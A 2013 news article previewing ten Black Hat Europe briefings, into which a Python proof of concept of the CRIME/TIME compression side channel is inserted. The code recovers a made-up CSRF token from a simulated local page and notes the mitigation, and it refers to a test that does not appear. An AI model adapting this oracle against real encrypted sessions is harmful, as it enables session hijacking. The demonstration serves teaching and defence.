Black Hat Europe: 10 intriguing security briefings

TIME attacks, medical device security, aggressive honeypots and car traffic hacking talks on tap at this week's Black Hat event

Black Hat Europe 2013

What could possibly go wrong having a bunch of hackers hunkering down in Amsterdam this week at Black Hat Europe 2013? We're afraid to speculate, but what should go right is that they're ready to present a lineup of briefings at this annual security event that look topical and compelling.

Presenters will discuss exploits and vulnerabilities in technologies such as Android and Windows 8, and offer attendees advice on how to protect these and other platforms. Here are 10 briefings that jumped out at us:

*Beyond CRIME attacks: TIME attacks: Two Imperva researchers will introduce Timing Info-leak Made Easy (TIME) attacks, which simplify the CRIME attacks revealed last year that abuse SSL/TLS data compression to hijack HTTP sessions. Where CRIME exploits compressed HTTP requests, TIME goes after HTTP responses, using response timing rather than direct observation of the compressed size. Don't worry, the pair also plan to discuss mitigation steps against TIME attacks.
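The compression side channel that CRIME and TIME both rest on, as an added example that is not the Imperva researchers' code: a constructed page reflects attacker-controlled input next to a secret anti-CSRF token, and the one candidate byte that extends the LZ77 back-reference into the secret makes the compressed response exactly one byte shorter. The page template, the token `7f3a9c1e`, the `KNOWN` context string and every function name are invented for this demo. The example reads the compressed size directly, which is what a network-position attacker sees; TIME infers that size from response timing. It asks zlib for the `Z_FIXED` strategy (static Huffman tables) so that the match length is the only variable cost and the oracle is exact; real servers use dynamic tables, which add noise that the published attacks handle with padding and repeated measurements.

```python
import zlib

# Constructed sample (not from the talk): a secret anti-CSRF token and the
# hex alphabet it is drawn from.
SECRET = "7f3a9c1e"
HEX = "0123456789abcdef"
# Static text that precedes the secret in every copy of the page.  Reflecting
# it in front of each guess lets the LZ77 match run straight into the
# guessed byte, so only the guess decides how long the back-reference is.
KNOWN = 'href="/logout?csrftoken='


def render(reflected, secret=SECRET):
    """Server side: an HTML body that echoes a search term and also carries
    the secret token in a logout link (constructed template)."""
    return (
        "<html><body>"
        f"<p>Results for: {reflected}</p>"
        f'<a href="/logout?csrftoken={secret}">Log out</a>'
        "</body></html>"
    ).encode()


def compressed_size(body, compress=True):
    """What the observer sees: the byte length of the (compressed) body.

    Z_FIXED forces static Huffman tables, so a hex literal always costs
    8 bits and the match-length codes used here all cost 9 bits.  The only
    difference between a right and a wrong guess is therefore one literal,
    i.e. exactly one output byte.
    """
    if not compress:
        return len(body)
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def guess_next_byte(prefix, compress=True):
    """Try every candidate after the already-recovered prefix and return the
    one whose response compresses smaller than all the others."""
    sizes = {g: compressed_size(render(KNOWN + prefix + g), compress)
             for g in HEX}
    best = min(sizes.values())
    winners = [g for g, n in sizes.items() if n == best]
    # More than one winner means the oracle is blind (e.g. no compression).
    return winners[0] if len(winners) == 1 else None


def recover_secret(length=len(SECRET), compress=True):
    """Byte-by-byte recovery: 16 requests per byte instead of 16**8 overall."""
    prefix = ""
    for _ in range(length):
        g = guess_next_byte(prefix, compress)
        if g is None:
            return None
        prefix += g
    return prefix


if __name__ == "__main__":
    print("with compression:   ", recover_secret())                # 7f3a9c1e
    print("without compression:", recover_secret(compress=False))  # None
```

Running the block recovers the token one byte at a time. With `compress=False` every candidate yields the same length and `recover_secret` returns `None`, which is the blunt form of the mitigation: do not compress responses that mix secrets with attacker-controlled input. The test below asserts the one-byte gap between a right and a wrong first guess, so the reader can see the oracle is exact under `Z_FIXED`.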


*Safeguarding medical devices: InGuardians' Jay Radcliffe will tackle the sticky and scary topic of medical device security. He says that the topic is draped in confusion and aims to clarify the situation by divvying up such devices into three types and discussing the FUD and reality around each from a security standpoint. Radcliffe will also address what regulatory bodies and manufacturers should do to help make medical devices more secure.

*Cloud storage services vs. your firewall - no contest: CRSgroup's Jake Williams will shed new light on how storage synchronization services such as Dropbox, often installed without approval on enterprise networks, create a data loss prevention (DLP) challenge as well as a way for malware to seep into organizations.

*How secure are mobile device protectors?: Researchers from Vulnex share findings on how easy or difficult it is for smartphone/tablet/laptop thieves to defeat security programs such as GPS trackers and remote data wipers.

*One more highway traffic nightmare to consider: Tools such as Google Navigation and Waze help drivers figure out on the fly how to avoid gridlock, but what if hackers got ahead of these systems and decided to have everyone head in the same direction? Hamburg University of Technology Ph.D. student Tobias Jeske will explain.

*Even appliances aren't safe: Appliances sound so secure: hardware and software prepackaged and ready to deliver firewall, email or other services to your network. But NCC Group's Ben Williams, a penetration tester, says he has "discovered and provided over 100 proof-of-concept exploits to various vendors over the past 12 months, and most of these have related to security appliances."

*Smile, you're on candid videoconferencing systems: Security consultant Moritz Jodeit has examined how to compromise Polycom HDX high-end videoconferencing systems via vulnerabilities in their H.323 stack, and how a compromised unit might be turned into a surveillance rootkit.

*A really sweet honeypot: A Nokia researcher will describe the concept of an aggressive honeypot, one that doesn't just lure and trap intruders, but goes on the offense by de-anonymizing them and taking control of them.

*Playing with app sandbox security: Sandboxing is a method of securing endpoints by keeping their apps confined, but Bromium researchers in this briefing will explain how a lack of sandboxing standards might make these supposed security systems not so safe after all.

*What's up dock?: NCC Group's Andy Davis says that with the flexibility of hot-desking comes the vulnerability of laptop docks as an attack target. He'll point out ways to detect compromised devices and mitigate risks they pose.

Bob Brown tracks network research in his Alpha Doggs blog and Facebook page, as well on Twitter and Google +.
